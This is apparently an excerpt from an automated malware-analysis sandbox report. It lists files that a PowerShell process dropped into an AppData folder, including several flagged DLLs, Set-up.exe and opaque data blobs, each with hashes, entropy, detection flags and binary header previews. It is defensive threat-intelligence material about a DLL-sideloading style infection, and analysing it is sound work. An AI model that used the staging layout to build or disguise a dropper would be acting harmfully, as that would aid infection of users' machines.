                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\icudtl.dat

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):10717680
                                                                                          Entropy (8bit):6.282426578921538
                                                                                          Encrypted:false
                                                                                          SSDEEP:196608:WgPBhORiuQwCliXUxbblHa93Whli6Z26wO+:W8wkDliXUxbblHa93Whli6ZUF
                                                                                          MD5:74BDED81CE10A426DF54DA39CFA132FF
                                                                                          SHA1:EB26BCC7D24BE42BD8CFBDED53BD62D605989BBF
                                                                                          SHA-256:7BF96C193BEFBF23514401F8F6568076450ADE52DD1595B85E4DFCF3DE5F6FB9
                                                                                          SHA-512:BD7B7B52D31803B2D4B1FD8CB76481931ED8ABB98D779B893D3965231177BDD33386461E1A820B384712013904DA094E3CD15EE24A679DDC766132677A8BE54A
                                                                                          Malicious:false
                                                                                          Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E.......E..P/...E.../...E..P7...E...7...E...h...F...h.. F..Pi..0F......DF.....WF.....jF..P...}F.......F..`....F.......F.. ....F.......F..0....F.......G......G......(G.....;G..@...NG......aG.....tG.......G.......G..@....G.......G.......G.......G..P....G.......H.......H..P...2H......EH..`...UH......hH......yH..P....H.......H.......H..`....H.......H.......H..P....I.......I......-I..@...=I......PI......aI..@...uI.......I...0...I.. 1...I..p1...I...e...I...e...I...i...I..`i...J...i..)J...K..BJ..p...^J..."'.uJ..P.'..J....'..J...5'..J..06'..J...>'..J..P?'..K...D'..K...F'.0K...H'.IK...V'.hK....(..K....(..K..P.)..K....)..K..pW*..K..P.*..L...*+.?L..p.+.bL....+..L...U,..L....,..L....,..L....,..L..@.,..M....,.-M..P.-.IM.. e-.`M...e-.~M...R/..M.../..M..0.0..M..@.0..M..P.0..M....0..N....0.!N...,0.9N...,0.NN..0-0.fN...-0.vN...Y0..N...Z0..N..

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\v8_context_snapshot.bin

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):613840
                                                                                          Entropy (8bit):5.353969995543054
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:ti2Cr/XgXBS/YKiMpN5zzivVsTRlWxYZbAIf+jL/k5nnPo7p1KFqUg/J6:tZCr/BzOvrYs1KgJ6
                                                                                          MD5:753BE41D649D31812067EC2B85C10F0E
                                                                                          SHA1:769531CC83B6D5DD9ABFECFA4C2D0C4128BF42F2
                                                                                          SHA-256:169FC7F80834ACF1D59B62C2ADBE6D1AD477CF2564EE84150DFFFD36CAA1CA33
                                                                                          SHA-512:86D76228FD82B09529D15D35B9BD45F7E0EA7328EA984FF9E0414A05746B7853DDB2AC8537A1D46B59F4A13F471120C3A428DF28FB51FC9FACC51C5F9EF6D497
                                                                                          Malicious:false
                                                                                          Preview:........O.'a.c>.7.5.288.23......................................................X...,>......p4......................P....B...B..P.......`....`....`....`....`t...`x...`V...`....`...... ....y.`H...D..X!}...X!A...X!A.D. ..Q.`H...D..X!m...X!E...X!E.D. ..`H...D..X!}...X!I...X!I.D. ....`H...D..X!}...X!M...X!M.D. ..i.`....D..X!q...X!Q...X!Q.D. ....`H...D..X!}...X!U...X!U.D. ..9.`H...D..X!}...X!Y...X!Y.D. ..`H...D..X!}...X!]...X!].D. ..`H...D..X!}...X!a...X!a.D. ....`H...D..X!u...X!e...X!e.D. ..`H...D..X!}...X!i...X!i.D.(Jb....!..... ..F`....^.Q...V`.....(Jb....1..... ..F`....^......@...IDa........D`....D`....D`.....`.....D]....D`.@.....V`......WIa...........V`......WIa...........WIa...........WIa...........WIa...........V`......WIa...........WIa...........WIa...........V`......WIa...........WIa...........WIa...........WIa............L`.....HD...D...D..Qb........3......D...L.........................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):519944
                                                                                          Entropy (8bit):6.065481336711818
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:rnXnae2TPlr3zvzar5oRDaw92wP6mai9gs6CU:78lrT+r5ADakP4i9gsc
                                                                                          MD5:65839A5C28A0DEE380C4EBA54E2D941F
                                                                                          SHA1:AC609EA7F86FE533820B801CFE40B22F8A7A3F1B
                                                                                          SHA-256:C7A4C035D89716B027F69C2CC98EAF5C44FB15B08C2EA162D793466356A35A2A
                                                                                          SHA-512:E6853FF5D10D11B5333F0697DCB660A042EBEAE12EEBC84427D0B9F896CF100258E7E6D18F531AAE700C0F476F91F11DA0272E7809728DF68DA80EE560136AEB
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s$............" ..0.................. ........... ....................... ...........@.................................@...O........................'..........h...T............................................ ............... ..H............text...h.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................t.......H.......,g..\P............................................................{<...*..{=...*V.(>.....}<.....}=...*...0..;........u(.....,/(?....{<....{<...o@...,.(A....{=....{=...oB...*.*. ... )UU.Z(?....{<...oC...X )UU.Z(A....{=...oD...X*.0...........r...p......%..{<..........+.....+...-.q+........+...-.&.+...+...oE....%..{=..........,.....,...-.q,........,...-.&.+...,...oE....(F...*r...(....(G.....}......}....*JrG..p.......(H...*2.,...s....z*..{....*N.,...i./...s......*N.,...i

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2598912
                                                                                          Entropy (8bit):6.604555317326718
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:5TFgiFpGXOENKRgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07M:5+iDaljxJsv6tWKFdu9CZgfn
                                                                                          MD5:17D26D22913C19D7A93F7F6AF7EC5D95
                                                                                          SHA1:0BBC1E108AF53990E4B9F2C34CBF7EFBE442BC92
                                                                                          SHA-256:E18684E62B3C076B91A776B71539A8B7640932055AE0831B73AD5FEE7C5DD4E7
                                                                                          SHA-512:FB2A4288BE915D7E62E6DCD1A4425A77C5DA69CC58DAA7F175B921FD017CDDB07F0D76C9016EB40475DEAD5DC7984B32B988AD6F5C5D14813B5A9E2867EB629A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):8581632
                                                                                          Entropy (8bit):6.736578346160889
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                          MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                          SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                          SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                          SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1053696
                                                                                          Entropy (8bit):6.539052666912709
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                          MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                          SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                          SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                          SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):356352
                                                                                          Entropy (8bit):6.447802510709224
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                          MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                          SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                          SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                          SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):30512
                                                                                          Entropy (8bit):6.293166408242498
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:37VPSe+T3KkTRIjjzi3WbR1zQnSyGUvXU7Ex3dVOSRZYNyb8E9VF6IYinAM+oaua:37VPSFTamMRbzCfzZQEpYinAMxJH4
                                                                                          MD5:F0739E1DB958FDE4DC6BAB9D75865191
                                                                                          SHA1:FEDADBF79B594995E6C44108D6B25CDBBF05EB65
                                                                                          SHA-256:27FAAC58C4EDC8FB147C9947FC9567AFD2F785B11252C2963788FD0F64F7CA42
                                                                                          SHA-512:ADBF2A0B42C6043EE5C984C02FCC8815B143117FA2EE0286B048F9E90D695F74F0129240E1DE36DEA2915F1E3D31359953095E6E5497337D01F0004D443AAD10
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!..0..F...........e... ........... ...............................3....`.................................He..O....................P..0'...........d............................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............N..............@..B................|e......H........3...1...........................................................0..H..........(*...(.......,.*........s..... .... .:..s....}............s....(%...*V.#......>@(....o3...*...0..=........(+...r...po......o2....(+...r3..po......&.(+...rw..po......*...........)).......*...0..@........(6....{....%-.&+. .... .:..(....&..}........(+...r...p.o......*........++.......0..7........{....,..{....o......}.....(8.......(+...r...p.o......*.........""......v.{......o....&.{....,..o...

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3136432
                                                                                          Entropy (8bit):5.953248030549441
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:KQ96YdG5LJ3Z3k0jbdHMsChIiv1o/spNM:FqBkMGsCJe
                                                                                          MD5:CF83372CE8462708F58817B1560E7006
                                                                                          SHA1:6484FDC351661E0EC40FF6D8EF2D9C1DF2B05F1A
                                                                                          SHA-256:37A5A53B7D95439B05B5E4F394DE8B931A500F6DF97AAF1A82CB8A66C11478F2
                                                                                          SHA-512:D4D24CFE4819343A98D2C83F62B456E922FF88215015D6A76D230D4034B68AFBEF45E3FAD2B92B6D2DBFC2772B65C0BB91545B61BD0231C8A75C03A4146352D6
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........h.......z.........@..............................0.......0...`.........................................>9#......9#.d.....)..l...@(.....HF/.h....P0..&....#.8.....................#.(...@...8............A#......*#......................text............................... ..`.rdata.../.......0..................@..@.data....<....$.......#.............@....pdata.......@(......~'.............@..@.gxfg....3... )..4...X(.............@..@.retplne.....`).......(..................tls....1....p).......(.............@....voltbl.D.....).......(.................CPADinfo8.....).......(.............@...LZMADEC.......).......(............. ..`_RDATA........).......(.............@..@malloc_h......).......(............. ..`.rsrc....l....)..n....(.............@..@.reloc...&...P0..(..../.............@..B........................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):6487736
                                                                                          Entropy (8bit):7.518089126573906
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                          MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                          SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                          SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                          SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):669792
                                                                                          Entropy (8bit):6.967035663118671
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:1/gzbnbASodCXNn5FJX5KrN9VmoBBDFDn8j:FRSoSn5FJX5KZ9VmoDKj
                                                                                          MD5:F75225DB13E3B86477DC8658C63F9B99
                                                                                          SHA1:6FFD5596FD69E161B788001ABAB195CC609476CF
                                                                                          SHA-256:4286CF3C1ED10B8D6E2794AB4ED1CFCDED0EA40D6794016CE926CD9B547C6A00
                                                                                          SHA-512:07DEE210DE39E9F303BB72558C4B2AEB5DE597638F0A5BFDCBE8F8BADFB46A45F7A1518726D543F18682214668D22586299159E2C3947A9285990867BC457327
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d...................."..`........B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):65856
                                                                                          Entropy (8bit):6.253138341040912
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:DyvHa8En7WFlzobIrmKD8owRaggg5TIcO3YDmj7Hx4:DyvHa8EnKFqKD8aK0jj6
                                                                                          MD5:760F24F0150A6E8DC15AC793C3172387
                                                                                          SHA1:920D5AAFB4B460EFC37B99564BD281E63C7EB647
                                                                                          SHA-256:E113F8593244C1BB5BCC73FEF0F93303C783714162CBD9EF93DDFF5709C037CE
                                                                                          SHA-512:E5251075164F9CDB154B0B5BF7B775C9720B0744D004B68CE6501A980342F45398505BC26F7CCA982BD23A03609B3C78510A5778A93041E7614E17B369A7209F
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. .......................@.......p....@.................................t...J.......................@'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......l....`..............`...........................................V. 0u..}........(....*.."..(....*...6..(....(....*...0..;.......s......s.......(.......,..o......o........,..o.......(....*.....................#).......0..;.......s......s.......(.......,..o......o........,..o.......(....*.....................#).......0..;.......s......s.......o.......,..o......o........,..o.......(....*.....................#).......0..B.......s......s.......o......o.......,..o......o...

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):146752
                                                                                          Entropy (8bit):6.209702529084155
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:8zWwFkpFMOKq9hC3ZWU+Oq1hZ+fVztxQ0rzc0to734o:s/zq9huqrZ+dbQIz1o
                                                                                          MD5:985F25C1D3144F37F046BC8F3E2B0C83
                                                                                          SHA1:C0B551C51317891D8220AB5A634C15ACF8223E88
                                                                                          SHA-256:3F71FA4C64376E85486B22DE926F61C3E3CDE3DE6C1D484E041F265534CCD623
                                                                                          SHA-512:B0DB2C878948922243CC80AB015A954B11C5E08FCE7DBE767722BC5082B150F277690ACF9DA1C657837E7A66059CAFA7BA76C3695BBA51B44467979F5A9C053B
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................-... ...@....@.. ..............................g"....@..................................-..J....@..................@'...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H........................................................................0..E........(......(......(......~....%-.&~..........s....%.....(...+(...+(....*...z..~.....?(....(....o....(....*..0...........(......~.....l(....(....o....(....(......~.....}(....(....o....(....(.....(....( ...,..~.... ....(....(.....~.... ....(....(....o!.....s"...(.....,5.o#....+..o$.....(.....s....o%....o&...-....,..o'....*.........$.........{....*"..}....*.....{....*"..}....*.....(....~....%-.&~...

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\isjii

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Atari 68xxx CPX file (version 4d53)
                                                                                          Category:dropped
                                                                                          Size (bytes):15400
                                                                                          Entropy (8bit):5.921776181449881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:/O3hRJxZvLMOOXgLaQPCDSupU5dwbADeQ6QirDde8QjbcRIo70xdF3yRLZ1XrRbP:gh5dLMOOUVu6gSeDWXo70d3yTJRb+K
                                                                                          MD5:744424FBBAC9BBA03E53DEA3587E327E
                                                                                          SHA1:B1CD89346897AA9A0787336B44E638E231B3CC15
                                                                                          SHA-256:E34C2C400FC112E079D825580F536EE43D5951F4DCA0C2C6C9C521CA609F09A5
                                                                                          SHA-512:7C2291B8E813EFD2C55D4D55620C435205848FCB3E0D7F8DC3153AFA7D6B4BCA7BBF80BB3F3732F850F80ADD87D8165DEEB3B94BC735A70E18509E276627E812
                                                                                          Malicious:false
                                                                                          Preview:.do.....MS...dYIL.Ws....eFR..Dja......[uau..G..C...L.Z.j..Hh....R.._wy.Y..k.pH....sF..G.gO._.G_...DTg..[Q.C...Dg.MK.........NWRLDZQ..wagV...EyP.R.g.Ui..Q.j......vS.p.....l..q..IRr.c...R......q....YAh...aCH..A..s.v...[.mrgRfqX.w.JR...y.....pY.X.s.HuyH..q......^v.N.V\_j.x.k.....X`fRo....sC.Cl....^MaMu..G.i..v].g......jIpS.........`kIv.t..^.a.^dNU....W.M..o...Z.S.Sc.C.c.i.b...UC.I[hIV.BCsLm...jKJ.....y..fcb.EpM..V....u..U.n..`g...c.b..E..r...OGt.Lm..sn.t.YRB..\nSB..vH.w..r.V...w.Sq.Fu...bX.W.....cl....q....GI...s..K.[..H.XX.X`.x`a.I......T..d[..w.R..Nn.Oe.v.u.....d....kVZ..\nX.i.t.v_foubdB...cgeOA.....\Wi.Za.UL.....A...fr.a.CJ.BPCI.x.v...J.n.MI._.[.Y.[Wd...G.C.Wi.cVK..d.lA..p...DH.R.X...u.g.P.[......V...rOhI.g.Ej.M^..x.h......iK.Q.rC..xQj.Rr]D]O..J..fE.YwCMX....me.Sr..c..iD.s...eEt.GnAZL....T.pqlCF.u.TVp[...r.H..].b...kYMo.U.GN...C..mRD...tbPgE.B........l.I..]HA.Xu....Yy..w.mKI.mK.M.....Ra..^ATWdq.....QOu._.ILk.....b...\cbU..a.ENV..eO.QnAVv.....r...o.h.w.Swr..J....beH.^Wl..YFK...Ukqaba...

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\looelll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):798054
                                                                                          Entropy (8bit):7.892501542250156
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:TwzX9HIvQxLWZ+Q6znQ1VK5eTlVUQgEiG9UzV+RhmwhvpYmgDH/3:ghIvSWZ+RStN5B9MV+RhmeizP
                                                                                          MD5:150E5E57AE9177A2CD6E587DF2D3B0EA
                                                                                          SHA1:88C981FB86B2624165CD1FAB41F2C7CCEB57151F
                                                                                          SHA-256:1C11168B529642BA3139672E4DD6BE5B1CAB7A206F220554155AF997427D3DA8
                                                                                          SHA-512:361C1596782BB064169F8BA622838EE945CB83CA422FF3277EEBF574AC3E6257B7470A6705E0E4DA2E996971EC04A849BBB45F8D86181A4DB74B782A47814107
                                                                                          Malicious:false
                                                                                          Preview:_B\MW.k............L.Ej\...p....c..kC..jZf.`rtk..T.gZ...s.Ktio.Lb.SZl...BDdm..vw.....ur..CcE.K..Kv.QXjP....vJ.LB.M..vasa..cYq..m..p.Rv...SRAp.]..l.^....PqY.`mt.W.dHKl.a.d.iX...ns.O.aHa......GJX......_`n..\Q..vW..H.a..fonSOSi.`Eh.Gm..]IH.t.J..MtMhf..W.O....h...r.j..y..x.._.g.b.S...P\..^.....w.........b.nFh..SA..i.VS\B.P.K.tn..U.I.[..`Fl.b..W......`...N....v.Ve...A.......Y.e.].xK...C.S..US......cqW.I.Z`ptM.B.....GOngM.VVabAxP..c..O.HC...^.G.nWl..........rp._.nAM.I.h..r...fut....r.xq..xCW....fWS]Y.Fs..p.B..VxHXyMH..Gub._Yt.CVa.\.OJaw.c^A..._Z.h....m..u.t.c]y.r.P._B....JRvGo.KJOl.xO.I..[....nL.c.r.MN....TkF._d.b.IIsjo..gB.D...s.NkS..oRBULqcY`bs.BIy.aW...K..to.WF..Lu...M.G..r.q..j...qETj.Kw.AyRg^_^Qc.G..S.JH.......f.x.v..Umb.Ll..N...cUtCwMi...P.P.....S.K.BQ^yILl.h._.l..x..B..Y.Q....jx^eNt..u..Gp.GI.S^G....i..P...W..r.......\.yaq^Up..imka.\.Nv.AaJdyC`cPA...D.V.Ov.o..t.f.pI.x`d.R..a.lS.\.p.UhDN....VXlEFcjMy...Ap..X...G.L^.B._W.Fxs]BK..^c..d......JIn]]C.]UwEC.VkF.TT...gBg...t..h..pv.....p`A.AD

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):421200
                                                                                          Entropy (8bit):6.59808962341698
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                          MD5:03E9314004F504A14A61C3D364B62F66
                                                                                          SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                          SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                          SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):770384
